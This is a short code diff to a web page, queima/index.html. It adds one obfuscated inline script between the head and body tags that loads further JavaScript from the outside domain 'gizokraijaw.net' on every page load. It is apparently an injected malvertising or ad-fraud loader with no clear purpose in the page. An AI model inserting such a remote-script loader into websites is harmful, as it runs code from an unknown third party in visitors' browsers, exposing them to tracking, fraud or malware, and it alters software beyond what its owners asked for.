--- a/queima/index.html
+++ b/queima/index.html
@@ -8,6 +8,7 @@
     <script src="https://apis.google.com/js/api.js"></script>
     <script src="contador.js"></script>
 </head>
+    <script>(function(d,z,s){s.src='https://'+d+'/401/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('gizokraijaw.net',7666746,document.createElement('script'))</script>
 <body>
   <div class="container">
     <div class="ref1">
